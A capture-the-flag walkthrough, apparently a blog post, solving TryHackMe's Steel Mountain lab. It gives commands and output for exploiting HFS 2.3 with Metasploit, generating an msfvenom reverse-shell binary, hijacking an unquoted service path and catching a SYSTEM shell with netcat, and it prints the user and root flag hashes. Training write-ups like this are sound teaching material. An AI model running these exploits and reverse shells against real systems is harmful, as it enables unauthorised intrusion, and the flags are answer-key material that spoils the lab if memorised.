thm-steelmountain-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Steelmountain at

https://tryhackme.com/room/gatekeeper

Credits to the room creator/s.

TryHackMe – Steel Mountain

[Task 1] Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.


#1 Deploy the machine.

Who is the employee of the month?

.

[Task 2] Initial Access

Now you have deployed the machine, lets get an initial shell!


#1 Scan the machine with nmap. What is the other port running a web server on?
#2 Take a look at the other web server. What file server is running?
#3 What is the CVE number to exploit this file server?
#4 Use Metasploit to get an initial shell. What is the user flag?

[Task 3] Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!


#1 To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

#2 Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?
#3 The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

#4 What is the root flag?

[Task 4] Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

.

Here’s the writeup :

As always we start with a nmap scan

kali@kali:~/thm$ nmap -A 10.10.55.161 -oN steelmountain.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-17 03:30 EDT
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.92% done; ETC: 03:31 (0:00:00 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 03:31 (0:00:00 remaining)
Nmap scan report for 10.10.55.161
Host is up (0.029s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-17T07:31:14+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:88:1e:b5:04:44 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-04-17T07:31:09
|_ start_date: 2020-04-17T06:48:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.78 seconds
kali@kali:~/thm$

.

.

msf5 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.11.3.122:4444 
[*] Using URL: http://0.0.0.0:8080/PDRAuFa4r7C8h
[*] Local IP: http://192.168.1.113:8080/PDRAuFa4r7C8h
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /PDRAuFa4r7C8h
[*] Sending stage (180291 bytes) to 10.10.55.161
[*] Meterpreter session 1 opened (10.11.3.122:4444 -> 10.10.55.161:62506) at 2020-04-17 02:50:52 -0400
[!] Tried to delete %TEMP%\MGKQmXpmJuEcFF.vbs, unknown result
[*] Server stopped.

meterpreter > cd /users
meterpreter > cd bill
meterpreter > cd desktop
meterpreter > ls
Listing: C:\users\bill\desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365

.

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

added Invoke-AllChecks to bottom of PowerUp.ps1 file
Other way to find this :
My next move was to use wmic to check for Unquoted Service Path. The syntax i used was: wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """.

With this information, i used msfvenom to generate a malicious binary.

kali@kali:~/thm$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe

.

I stop the service using Service Control.

Now, i uploaded the binary to C:\Program Files (x86)\IObit. Before starting the service, create a netcat listener, then drop into a shell and start the service with Service Control (sc start AdvancedSystemCareService9).

I received the reverse shell. Now, if we want to upgrade our shell, we can use metasploit Web Delivery module as follows.

image [Web delivery] here

Web delivery configuration

I already had it pre configured. I just changed a few things. Also, don’t forget to use the PSH (set target 2) delivery. Now, just copy-paste it in your generic shell you spawned earlier and hit enter. You’ll receive the connection in metasploit.

You upgraded the shell. Now you can run hashdump, pivot if needed and so on.

C:\users\bill\desktop>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
Advanced SystemCare Service 9 AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Auto 
Application Host Helper Service AppHostSvc C:\Windows\system32\svchost.exe -k apphost Auto 
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto 
Base Filtering Engine BFE C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Background Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Cryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k NetworkService Auto 
DCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
DHCP Client Dhcp C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
DNS Client Dnscache C:\Windows\system32\svchost.exe -k NetworkService Auto 
Wired AutoConfig dot3svc C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Manual 
Diagnostic Policy Service DPS C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork Auto 
Windows Event Log EventLog C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted Auto 
COM+ Event System EventSystem C:\Windows\system32\svchost.exe -k LocalService Auto 
Windows Font Cache Service FontCache C:\Windows\system32\svchost.exe -k LocalService Auto 
Group Policy Client gpsvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
IKE and AuthIP IPsec Keying Modules IKEEXT C:\Windows\system32\svchost.exe -k netsvcs Auto 
IObit Uninstaller Service IObitUnSvr C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe Auto 
IP Helper iphlpsvc C:\Windows\System32\svchost.exe -k NetSvcs Auto 
Server LanmanServer C:\Windows\system32\svchost.exe -k netsvcs Auto 
Workstation LanmanWorkstation C:\Windows\System32\svchost.exe -k NetworkService Auto 
LiveUpdate LiveUpdateSvc C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe Auto 
TCP/IP NetBIOS Helper lmhosts C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
Windows Firewall MpsSvc C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Distributed Transaction Coordinator MSDTC C:\Windows\System32\msdtc.exe Auto 
Network Location Awareness NlaSvc C:\Windows\System32\svchost.exe -k NetworkService Auto 
Network Store Interface Service nsi C:\Windows\system32\svchost.exe -k LocalService Auto 
Power Power C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
User Profile Service ProfSvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
Remote Access Auto Connection Manager RasAuto C:\Windows\System32\svchost.exe -k netsvcs Manual 
Remote Registry RemoteRegistry C:\Windows\system32\svchost.exe -k localService Auto 
RPC Endpoint Mapper RpcEptMapper C:\Windows\system32\svchost.exe -k RPCSS Auto 
Remote Procedure Call (RPC) RpcSs C:\Windows\system32\svchost.exe -k rpcss Auto 
Security Accounts Manager SamSs C:\Windows\system32\lsass.exe Auto 
Task Scheduler Schedule C:\Windows\system32\svchost.exe -k netsvcs Auto 
System Event Notification Service SENS C:\Windows\system32\svchost.exe -k netsvcs Auto 
Shell Hardware Detection ShellHWDetection C:\Windows\System32\svchost.exe -k netsvcs Auto 
Print Spooler Spooler C:\Windows\System32\spoolsv.exe Auto 
Software Protection sppsvc C:\Windows\system32\sppsvc.exe Auto 
System Events Broker SystemEventsBroker C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Themes Themes C:\Windows\System32\svchost.exe -k netsvcs Auto 
Distributed Link Tracking Client TrkWks C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted Auto 
User Access Logging Service UALSVC C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Auto 
World Wide Web Publishing Service W3SVC C:\Windows\system32\svchost.exe -k iissvcs Auto 
Windows Connection Manager Wcmsvc C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
WinHTTP Web Proxy Auto-Discovery Service WinHttpAutoProxySvc C:\Windows\system32\svchost.exe -k LocalService Manual 
Windows Management Instrumentation Winmgmt C:\Windows\system32\svchost.exe -k netsvcs Auto 
Windows Remote Management (WS-Management) WinRM C:\Windows\System32\svchost.exe -k NetworkService Auto 
Windows Licensing Monitoring Service WLMS C:\Windows\system32\wlms\wlms.exe Auto

C:\users\bill\desktop>cd C:\Program Files (x86)\IObit\Advanced SystemCare\
cd C:\Program Files (x86)\IObit\Advanced SystemCare\

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:

The service has not been started.


C:\Program Files (x86)\IObit\Advanced SystemCare>^Z
Background channel 3? [y/N] y
meterpreter > upload ascservice.exe
[*] uploading : ascservice.exe -> ascservice.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): ascservice.exe -> ascservice.exe
[*] uploaded : ascservice.exe -> ascservice.exe
meterpreter > shell
Process 3640 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\users\bill\desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of C:\users\bill\desktop

04/16/2020 11:58 PM <DIR> .
04/16/2020 11:58 PM <DIR> ..
04/16/2020 11:58 PM 73,802 ascservice.exe
09/27/2019 05:42 AM 70 user.txt
2 File(s) 73,872 bytes
2 Dir(s) 44,160,622,592 bytes free

C:\users\bill\desktop>copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
Overwrite C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe? (Yes/No/All): A
A
1 file(s) copied.

C:\users\bill\desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
..
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.55.161] 62551
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of c:\Users\Administrator\Desktop

09/27/2019 05:41 AM <DIR> .
09/27/2019 05:41 AM <DIR> ..
09/27/2019 05:41 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 44,262,805,504 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
c:\Users\Administrator\Desktop>

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Author : Puckiestyle

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *